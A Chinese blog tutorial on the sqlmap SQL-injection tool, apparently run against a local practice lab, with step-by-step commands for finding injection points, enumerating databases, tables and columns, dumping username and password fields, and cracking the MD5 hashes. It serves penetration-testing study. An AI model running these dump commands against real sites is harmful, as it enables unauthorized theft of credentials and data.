• Sqlmap 工具用法详解

                             
 
                sqlmap是一款自动化的sql注入工具。
 
 
1.主要功能:扫描、发现、利用给定的url的sql注入漏洞,内置许多绕过插件。
 
2.支持的数据库:mysql、oracle、sql server、access、DB2、sqlite、postgresql、Firebird、sybase、sap maxDB。
 
3.采用5种注入技术:
 
[1]基于布尔的盲注:根据返回页面判断条件真假
[2]基于时间的盲注:使用条件语句查看时间延迟语句是否执行(页面返回时间是否增加)
[3]基于报错注入:返回错误信息,或将注入语句的结果返回页面中
[4]联合查询注入:在允许使用union的情况下注入
[5]堆查询注入:同时执行多条语句注入
 
4.用法
 
1>判断是否有注入点
 
sqlmap.py  -u  http://192.168.1.xxx/sql1/less-1/?id=1
 
出现类似下图的回显,则说明有注入点
 
 
注:当注入点后的参数大于等于两个时,需要加双引号
 
sqlmap.py  -u “http://192.168.1.xxx/sql1/less-1/?id=1&uid=2 ”
 
 
 
2>判断文本中的请求是否存在注入
 
sqlmap可以从一个文本文件中获取http请求(这样的好处在于:不用设置其他参数,例如cookie、post数据等)
 
下图1.txt的内容是web数据包
 
sqlmap.py  -r  路径/1.txt
 
注:-r一般存在cookie注入时使用
 
3>查询当前用户下的所有数据库
 
小提示:首先你要先确定有注入点,才能用该命令查询用户的数据库
 
sqlmap.py  -u  http://192.168.1.xxx/sql1/less-1/?id=1 --dbs
 
下图是爆出来的数据库
 
如果还需要在爆出来的指定数据库查询数据,则需要将上一条命令中的 --dbs 缩写成 -D xxx (意思是在xxx数据库中继续查询数据)
 
 
4>获取数据库中的表名
 
sqlmap.py  -u  “http://192.168.1.xxx/sql1/union.php?id=1 ” -D dkeye --table
 
下图就是表名
 
注:将上一条命令中的--table缩写成-T时,表示在某表中继续查询
       若在该命令中不加-D参数来指定具体的数据库,那么sqlmap会把数据库中所有表列出
 
5>获取表中的字段名
 
sqlmap.py  -u  “http://192.168.1.xxx/sql1/union.php?id=1  ” -D dkeye -T user_info --columns
 
 
注:在后续注入中 --columns可以缩写成-C
 
6>获取字段内容
 
sqlmap.py  -u  “http://192.168.1.xxx/sql1/union.php?id=1 ” -D dkeye -T user_info -C username,password --dump
 
这里获取的是dkeye数据库里的user_info表中的username和password的值
 
 
7>获取数据库的所有用户
 
 
sqlmap.py  -u  “http://192.168.1.xxx/sql1/union.php?id=1 ” --users
 
8>获取数据库
 
sqlmap.py  -u  “http://192.168.1.xxx/sql1/union.php?id=1 ” --passwords
 
 
这里我们可以看到密码是用md5加密的,我们需要去解密(小工具或者在线解码网站都可以)
 
9>获取当前网站数据库的名称
 
 
sqlmap.py  -u  “http://192.168.1.xxx/sql1/union.php?id=1 ” --current  -db
 
 
10>获取当前网站数据库的用户名称
 
 
sqlmap.py  -u  “http://192.168.1.xxx/sql1/union.php?id=1 ” --current  -user
 
 
 
 
 
 
 
参考资料:

《Web安全攻防 渗透测试实战指南》

Sqlmap 工具用法详解的更多相关文章

  1. PowerShell攻防进阶篇:nishang工具用法详解

    PowerShell攻防进阶篇:nishang工具用法详解 导语:nishang,PowerShell下并肩Empire,Powersploit的神器. 开始之前,先放出个下载地址! 下载地址:htt ...

  2. Nmap工具用法详解

    Nmap                                       Network  Mapper    是一款开放源代码的网络探测和安全审核工具   1.介绍  

  3. Oracle--DBV命令行工具用法详解及坏块修复

    一,介绍 DBV(DBVERIFY)是Oracle提供的一个命令行工具,它可以对数据文件物理和逻辑两种一致性检查.但是这个工具不会检查索引记录和数据记录的匹配关系,这种检查必须使用analyze va ...

  4. Mysql导入导出工具Mysqldump和Source命令用法详解

    Mysql本身提供了命令行导出工具Mysqldump和Mysql Source导入命令进行SQL数据导入导出工作,通过Mysql命令行导出工具Mysqldump命令能够将Mysql数据导出为文本格式( ...

  5. [转]Mysql导入导出工具Mysqldump和Source命令用法详解

    Mysql本身提供了命令行导出工具Mysqldump和Mysql Source导入命令进行SQL数据导入导出工作,通过Mysql命令行导出工具Mysqldump命令能够将Mysql数据导出为文本格式( ...

  6. linux管道命令grep命令参数及用法详解---附使用案例|grep

    功能说明:查找文件里符合条件的字符串. 语 法:grep [-abcEFGhHilLnqrsvVwxy][-A<显示列数>][-B<显示列数>][-C<显示列数>] ...

  7. linux curl用法详解

    linux ‍‍curl用法详解 ‍‍curl的应用方式,一是可以直接通过命令行工具,另一种是利用libcurl库做上层的开发.本篇主要总结一下命令行工具的http相关的应用, 尤其是http下载方面 ...

  8. 教程-Delphi中Spcomm使用属性及用法详解

    Delphi中Spcomm使用属性及用法详解 Delphi是一种具有 功能强大.简便易用和代码执行速度快等优点的可视化快速应用开发工具,它在构架企业信息系统方面发挥着越来越重要的作用,许多程序员愿意选 ...

  9. linux dd命令参数及用法详解---用指定大小的块拷贝一个文件(也可整盘备份)

    linux dd命令参数及用法详解---用指定大小的块拷贝一个文件 日期:2010-06-14 点击:3830 来源: 未知 分享至:            linux dd命令使用详解 dd 的主要 ...

随机推荐

  1. apache http server 和tomcat的区别 以及nginx

    Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器. 要明白他们之间的区别,我们首先需要明白HTTP协议.HTML页面.JSP.Servlet之 ...

  2. python下matplotlib、numpy、pandas联合作图逐步深入分析

    1.代码1: from pandas import Series,DataFrame from numpy.random import randn import numpy as np import ...

  3. golang中的net/rpc包

    本文先介绍RPC,然后go原生对RPC的使用,之后是介绍go语言中有哪些RPC框架以及一些其他常见的框架,最后是探究go语言中rpc的源码. (1)首先介绍下什么RPC? (2)RPC可以做什么? ( ...

  4. 在网页中插入背景音乐代码(html)

    有两种 分别用<bgsound>和<embed></embed>标签,当用<embed>插入背景音乐时可以设置宽度和高度为0,隐藏播放器. 二者的参数如 ...

  5. 每天进步一点点------ModelSim仿真Altera的ROM

    1. 在QuartusII中生成rom的初始化文件,可以是hex,也可以是mif.MIF文件的格式很简单明了,所以我一向都是用MIF. 2.下载convert_hex2ver.dll文件,conver ...

  6. 题解 P3951 小凯的疑惑

    P3951 小凯的疑惑 数论极菜的小萌新我刚看这题时看不懂exgcd做法的题解,后来在网上找到了一篇博客,感觉代码和推导都更加清新易懂,于是在它的基础上写了题解qwq 分析 两数互质,且有无限个,想到 ...

  7. 直方图histeq

    histeq的原理: [MN]=size(H); [counts,x]=imhist(H);%H是读取的图像,imhist是对图像直方图进行统计,其中count,是每个灰度值得个数,x代表灰度值.一般 ...

  8. 喵星之旅-狂奔的兔子-基于docker的rabbitmq安装

    docker安装参考:喵星之旅-狂奔的兔子-docker安装和基本使用 一.查询镜像名称 由于我们要安装的是有web管理页面的,不能直接拉取,需要指定版本. 登录docker仓库查询:https:// ...

  9. bugku come_game

    首先打开游戏发现就是一个单纯的游戏但是当你闯过一关去的时候会发现会多一个文件 看一下玩游戏前 与玩游戏之后有什么变化 然后发现一个文件叫temp 然后用hxd进行分析一下然后尝试着将01改成02然后就 ...

  10. Logarithmic-Trigonometric积分系列(二)

    \[\Large\displaystyle \int_0^{\pi/2}\ln^2(\sin x)\ln(\cos x)\tan x \,{\rm d}x\] \(\Large\mathbf{Solu ...